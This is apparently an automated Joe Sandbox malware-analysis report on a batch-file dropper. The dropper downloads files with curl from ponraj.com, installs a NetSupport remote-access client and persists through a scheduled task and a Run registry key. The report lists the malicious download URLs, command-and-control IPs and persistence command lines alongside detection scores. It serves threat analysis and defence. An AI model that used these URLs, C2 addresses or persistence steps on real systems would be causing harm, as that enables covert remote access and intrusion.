                                Source: Yara matchFile source: C:\ProgramData\PCICL32.DLL, type: DROPPED

                                Mitre Att&ck Matrix

                                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                                1
                                Valid Accounts                                		1
                                Windows Management Instrumentation                                		1
                                DLL Side-Loading                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		2
                                Input Capture                                		1
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		Exfiltration Over Other Network Medium1
                                Ingress Tool Transfer                                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                                Default Accounts11
                                Scripting                                		1
                                Valid Accounts                                		1
                                Valid Accounts                                		11
                                Scripting                                		LSASS Memory3
                                File and Directory Discovery                                		Remote Desktop Protocol1
                                Screen Capture                                		Exfiltration Over Bluetooth11
                                Encrypted Channel                                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                                Domain Accounts2
                                Native API                                		1
                                Scheduled Task/Job                                		1
                                Access Token Manipulation                                		3
                                Obfuscated Files or Information                                		Security Account Manager34
                                System Information Discovery                                		SMB/Windows Admin Shares2
                                Input Capture                                		Automated Exfiltration3
                                Non-Application Layer Protocol                                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                                Local Accounts1
                                Command and Scripting Interpreter                                		1
                                Registry Run Keys / Startup Folder                                		12
                                Process Injection                                		1
                                Software Packing                                		NTDS41
                                Security Software Discovery                                		Distributed Component Object ModelInput CaptureScheduled Transfer4
                                Application Layer Protocol                                		SIM Card SwapCarrier Billing Fraud
                                Cloud Accounts1
                                Scheduled Task/Job                                		Network Logon Script1
                                Scheduled Task/Job                                		1
                                DLL Side-Loading                                		LSA Secrets2
                                Virtualization/Sandbox Evasion                                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                                Replication Through Removable MediaLaunchdRc.common1
                                Registry Run Keys / Startup Folder                                		1
                                Masquerading                                		Cached Domain Credentials1
                                Process Discovery                                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                                Valid Accounts                                		DCSync11
                                Application Window Discovery                                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                                Modify Registry                                		Proc Filesystem1
                                Remote System Discovery                                		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)2
                                Virtualization/Sandbox Evasion                                		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                                Access Token Manipulation                                		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron12
                                Process Injection                                		Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1275250 Sample: tUUPQygorhzFkIcHuB.bat Startdate: 18/07/2023 Architecture: WINDOWS Score: 76 77 Multi AV Scanner detection for domain / URL 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 Antivirus detection for URL or domain 2->81 8 cmd.exe 7 2->8         started        12 cmd.exe 1 2->12         started        14 client32.exe 2->14         started        16 client32.exe 2->16         started        process3 file4 55 C:\Users\user\AppData\Local\Temp\b3.vbs, ASCII 8->55 dropped 57 C:\Users\user\AppData\Local\Temp\b2.vbs, ASCII 8->57 dropped 59 C:\Users\user\AppData\Local\Temp\b1.vbs, ASCII 8->59 dropped 85 Command shell drops VBS files 8->85 87 Uses cmd line tools excessively to alter registry or file data 8->87 89 Uses schtasks.exe or at.exe to add and modify task schedules 8->89 18 cmd.exe 8->18         started        21 cmd.exe 1 8->21         started        23 cmd.exe 1 8->23         started        29 2 other processes 8->29 25 client32.exe 12->25         started        27 conhost.exe 12->27         started        signatures5 process6 signatures7 83 Uses cmd line tools excessively to alter registry or file data 18->83 31 cmd.exe 1 18->31         started        33 cmd.exe 1 18->33         started        35 schtasks.exe 1 18->35         started        45 5 other processes 18->45 37 curl.exe 2 21->37         started        41 curl.exe 2 23->41         started        43 curl.exe 1 29->43         started        process8 dnsIp9 47 7zz.exe 21 31->47         started        50 client32.exe 18 33->50         started        53 C:\ProgramData\7zz.exe, PE32 37->53 dropped 75 ponraj.com 188.127.225.160, 443, 49720, 49721 DHUBRU Russian Federation 41->75 file10 process11 dnsIp12 61 C:\ProgramData\remcmdstub.exe, PE32 47->61 dropped 63 C:\ProgramData\putty.exe, PE32+ 47->63 dropped 65 C:\ProgramData\pcicapi.dll, PE32 47->65 dropped 67 6 other files (1 malicious) 47->67 dropped 69 5.252.178.48, 443, 49723 MIVOCLOUDMD Moldova Republic of 50->69 71 geography.netsupportsoftware.com 62.172.138.67, 49724, 80 BTGB United Kingdom 50->71 73 geo.netsupportsoftware.com 50->73 file13

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                tUUPQygorhzFkIcHuB.bat0%ReversingLabs
                                tUUPQygorhzFkIcHuB.bat3%VirustotalBrowse

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\ProgramData\7zz.exe0%ReversingLabs
                                C:\ProgramData\HTCTL32.DLL3%ReversingLabs
                                C:\ProgramData\PCICHEK.DLL5%ReversingLabs
                                C:\ProgramData\PCICL32.DLL5%ReversingLabs
                                C:\ProgramData\TCCTL32.DLL3%ReversingLabs
                                C:\ProgramData\client32.exe11%ReversingLabs
                                C:\ProgramData\msvcr100.dll0%ReversingLabs
                                C:\ProgramData\pcicapi.dll3%ReversingLabs
                                C:\ProgramData\putty.exe0%ReversingLabs
                                C:\ProgramData\remcmdstub.exe3%ReversingLabs

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                SourceDetectionScannerLabelLink
                                ponraj.com10%VirustotalBrowse

                                URLs

                                SourceDetectionScannerLabelLink
                                http://www.pci.co.uk/support0%URL Reputationsafe
                                https://sectigo.com/CPS00%URL Reputationsafe
                                http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                                http://ocsp.sectigo.com00%URL Reputationsafe
                                http://www.pci.co.uk/supportsupport0%URL Reputationsafe
                                http://%s/testpage.htmwininet.dll0%Avira URL Cloudsafe
                                http://ocsp.thawte.com00%URL Reputationsafe
                                http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
                                http://127.0.0.1RESUMEPRINTING0%URL Reputationsafe
                                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                                https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                                http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
                                https://www.chiark.greenend.org.uk/~sgtatham/putty/0%URL Reputationsafe
                                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                                http://%s/testpage.htm0%Avira URL Cloudsafe
                                http://%s/fakeurl.htm0%Avira URL Cloudsafe
                                http://127.0.0.10%Avira URL Cloudsafe
                                https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lol.7z:100%Avira URL Cloudmalware
                                https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe100%Avira URL Cloudmalware
                                https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/2.bat100%Avira URL Cloudmalware
                                https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lol.7z-oC:100%Avira URL Cloudmalware
                                http://5.252.178.48/fakeurl.htm0%Avira URL Cloudsafe
                                https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe-oC:100%Avira URL Cloudmalware
                                https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/2.bat-oC:100%Avira URL Cloudmalware
                                https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lol.7z100%Avira URL Cloudmalware

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geography.netsupportsoftware.com
                                		62.172.138.67
                                		truefalse
                                  		high
                                  ponraj.com
                                  		188.127.225.160
                                  		truefalseunknown
                                  geo.netsupportsoftware.com
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exetrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://geo.netsupportsoftware.com/location/loca.aspfalse
                                      		high
                                      https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lol.7ztrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://5.252.178.48/fakeurl.htmfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/2.battrue
                                      • Avira URL Cloud: malware
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://www.netsupportsoftware.com7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe.13.drfalse
                                        		high
                                        http://www.pci.co.uk/support7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000015.00000002.412171192.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000018.00000002.433693165.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000019.00000002.451024068.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, PCICL32.DLL.13.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://%s/testpage.htmwininet.dll7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.658205663.000000006BF90000.00000002.00000001.01000000.00000009.sdmp, HTCTL32.DLL.13.drfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        https://sectigo.com/CPS07zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl07zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000015.00000002.412125437.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000018.00000002.433656275.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000019.00000002.450976301.0000000011194000.00000002.00000001.01000000.00000005.sdmp, PCICL32.DLL.13.drfalse
                                          		high
                                          http://ocsp.sectigo.com07zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://geo.netsupportsoftware.com/ogclient32.exe, 00000010.00000003.409709051.0000000005D1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.pci.co.uk/supportsupport7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000015.00000002.412171192.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000018.00000002.433693165.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000019.00000002.451024068.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, PCICL32.DLL.13.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://ocsp.thawte.com07zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe.13.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://geo.netsupportsoftware.com/location/loca.aspsLVclient32.exe, 00000010.00000003.412099334.0000000005CD1000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.416938121.0000000005CFD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.409709051.0000000005D2A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.411970326.0000000005D2E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.415126144.0000000005D20000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.415864969.0000000005CFD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.411806687.0000000005D1F000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.416851707.0000000005D2E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.413186651.0000000005CF0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.411090507.0000000005D2E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.655064090.0000000005D1C000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.413747709.0000000005D2E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.412310764.0000000005CF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#7zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://127.0.0.1RESUMEPRINTING7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000015.00000002.412125437.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000018.00000002.433656275.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000019.00000002.450976301.0000000011194000.00000002.00000001.01000000.00000005.sdmp, PCICL32.DLL.13.drfalse
                                              • URL Reputation: safe
                                              		low
                                              http://%s/testpage.htm7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.658205663.000000006BF90000.00000002.00000001.01000000.00000009.sdmp, HTCTL32.DLL.13.drfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#7zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://geo.netsupportsoftware.com/location/loca.aspYLclient32.exe, 00000010.00000003.407845110.0000000005D1C000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.408015163.0000000005D27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://127.0.0.17zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000015.00000002.412125437.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000018.00000002.433656275.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000019.00000002.450976301.0000000011194000.00000002.00000001.01000000.00000005.sdmp, PCICL32.DLL.13.drfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.symauth.com/cps0(7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000D.00000003.401594990.0000000002751000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.13.dr, TCCTL32.DLL.13.dr, PCICHEK.DLL.13.dr, pcicapi.dll.13.dr, remcmdstub.exe.13.dr, HTCTL32.DLL.13.drfalse
                                                  		high
                                                  https://www.chiark.greenend.org.uk/~sgtatham/putty/07zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://%s/fakeurl.htm7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.658205663.000000006BF90000.00000002.00000001.01000000.00000009.sdmp, HTCTL32.DLL.13.drfalse
                                                  • Avira URL Cloud: safe
                                                  		low
                                                  https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/2.bat-oC:curl.exe, 00000007.00000002.398580764.00000287CB4A0000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://geo.netsupportsoftware.com/client32.exe, 00000010.00000003.409709051.0000000005D1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://geo.netsupportsoftware.com/location/loca.aspNclient32.exe, 00000010.00000003.409709051.0000000005D2A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.411090507.0000000005D2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe-oC:curl.exe, 00000005.00000002.396342674.000001615B1E0000.00000004.00000020.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t7zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lol.7z:curl.exe, 00000003.00000003.392913606.0000022D39A23000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.393357483.0000022D39A3C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.392896300.0000022D39A21000.00000004.00000020.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y7zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://crl.thawte.com/ThawteTimestampingCA.crl07zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe.13.drfalse
                                                        		high
                                                        https://www.chiark.greenend.org.uk/~sgtatham/putty/7zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.symauth.com/rpa007zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000D.00000003.401594990.0000000002751000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.13.dr, TCCTL32.DLL.13.dr, PCICHEK.DLL.13.dr, pcicapi.dll.13.dr, remcmdstub.exe.13.dr, HTCTL32.DLL.13.drfalse
                                                          		high
                                                          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#7zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lol.7z-oC:curl.exe, 00000003.00000002.393332683.0000022D39A07000.00000004.00000020.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.netsupportschool.com/tutor-assistant.asp11(L7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000015.00000002.412171192.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000018.00000002.433693165.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000019.00000002.451024068.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, PCICL32.DLL.13.drfalse
                                                            		high
                                                            http://www.netsupportschool.com/tutor-assistant.asp7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000015.00000002.412171192.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000018.00000002.433693165.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000019.00000002.451024068.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, PCICL32.DLL.13.drfalse
                                                              		high

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              5.252.178.48
                                                              		unknownMoldova Republic of
                                                              		39798MIVOCLOUDMDfalse
                                                              188.127.225.160
                                                              		ponraj.comRussian Federation
                                                              		56694DHUBRUfalse
                                                              62.172.138.67
                                                              		geography.netsupportsoftware.comUnited Kingdom
                                                              		5400BTGBfalse

                                                              General Information

                                                              Joe Sandbox Version:38.0.0 Beryl
                                                              Analysis ID:1275250
                                                              Start date and time:2023-07-18 17:36:07 +02:00
                                                              Joe Sandbox Product:CloudBasic
                                                              Overall analysis duration:0h 12m 29s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                              Number of analysed new started processes analysed:27
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • HDC enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample file name:tUUPQygorhzFkIcHuB.bat
                                                              Detection:MAL
                                                              Classification:mal76.evad.winBAT@42/29@4/3
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HDC Information:
                                                              • Successful, ratio: 69.8% (good quality ratio 66.9%)
                                                              • Quality average: 84.6%
                                                              • Quality standard deviation: 25.8%
                                                              HCA Information:Failed
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .bat

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                                              • Excluded IPs from analysis (whitelisted): 13.107.42.254
                                                              • Excluded domains from analysis (whitelisted): l-9999.l-msedge.net, l-ring.msedge.net, ctldl.windowsupdate.com, l-ring.l-9999.l-msedge.net
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              17:37:15Task SchedulerRun new task: KAVAQQQ path: cmd.exe s>/c C:\ProgramData\client32.exe
                                                              17:37:16AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run KAVAS C:\ProgramData\client32.exe
                                                              17:37:25AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run KAVAS C:\ProgramData\client32.exe

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              5.252.178.48h60FUiSRcC.jsGet hashmaliciousUnknownBrowse
                                                              • http://5.252.178.48/fakeurl.htm
                                                              h60FUiSRcC.jsGet hashmaliciousUnknownBrowse
                                                              • http://5.252.178.48/fakeurl.htm
                                                              niqS1law5h.jsGet hashmaliciousUnknownBrowse
                                                              • http://5.252.178.48/fakeurl.htm
                                                              niqS1law5h.jsGet hashmaliciousUnknownBrowse
                                                              • http://5.252.178.48/fakeurl.htm
                                                              188.127.225.160VjFeSeLhGMruZwwyqsIvUMXvstQqpgFfbYh.batGet hashmaliciousUnknownBrowse
                                                                2_1.batGet hashmaliciousUnknownBrowse
                                                                  h60FUiSRcC.jsGet hashmaliciousUnknownBrowse
                                                                    2.batGet hashmaliciousUnknownBrowse
                                                                      sett.batGet hashmaliciousUnknownBrowse
                                                                        h60FUiSRcC.jsGet hashmaliciousUnknownBrowse
                                                                          niqS1law5h.jsGet hashmaliciousUnknownBrowse
                                                                            niqS1law5h.jsGet hashmaliciousUnknownBrowse
                                                                              iGlTkXaLWeKxfXgiFdNuxOaOgbdWVaOw.batGet hashmaliciousUnknownBrowse
                                                                                Browser_update.jsGet hashmaliciousUnknownBrowse
                                                                                  Browser_portable_version.jsGet hashmaliciousUnknownBrowse
                                                                                    Browser_update.jsGet hashmaliciousUnknownBrowse
                                                                                      8bx1ECBJPP.jsGet hashmaliciousUnknownBrowse
                                                                                        8bx1ECBJPP.jsGet hashmaliciousUnknownBrowse

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          geography.netsupportsoftware.comh60FUiSRcC.jsGet hashmaliciousUnknownBrowse
                                                                                          • 62.172.138.67
                                                                                          h60FUiSRcC.jsGet hashmaliciousUnknownBrowse
                                                                                          • 62.172.138.8
                                                                                          PurchaseOrder.exeGet hashmaliciousUnknownBrowse
                                                                                          • 51.142.119.24
                                                                                          a6PzqKcp6K.exeGet hashmaliciousUnknownBrowse
                                                                                          • 51.142.119.24
                                                                                          niqS1law5h.jsGet hashmaliciousUnknownBrowse
                                                                                          • 51.142.119.24
                                                                                          niqS1law5h.jsGet hashmaliciousUnknownBrowse
                                                                                          • 51.142.119.24
                                                                                          Browser_update.jsGet hashmaliciousUnknownBrowse
                                                                                          • 51.142.119.24
                                                                                          Browser_portable_version.jsGet hashmaliciousUnknownBrowse
                                                                                          • 62.172.138.8
                                                                                          Browser_update.jsGet hashmaliciousUnknownBrowse
                                                                                          • 62.172.138.67
                                                                                          auf1536.jsGet hashmaliciousUnknownBrowse
                                                                                          • 62.172.138.8
                                                                                          rechn1831.jsGet hashmaliciousUnknownBrowse
                                                                                          • 51.142.119.24
                                                                                          auf1536.jsGet hashmaliciousUnknownBrowse
                                                                                          • 51.142.119.24
                                                                                          rechn1831.jsGet hashmaliciousUnknownBrowse
                                                                                          • 62.172.138.8
                                                                                          8bx1ECBJPP.jsGet hashmaliciousUnknownBrowse
                                                                                          • 62.172.138.67
                                                                                          8bx1ECBJPP.jsGet hashmaliciousUnknownBrowse
                                                                                          • 62.172.138.67
                                                                                          i7gVJvg3pD.jsGet hashmaliciousUnknownBrowse
                                                                                          • 62.172.138.67
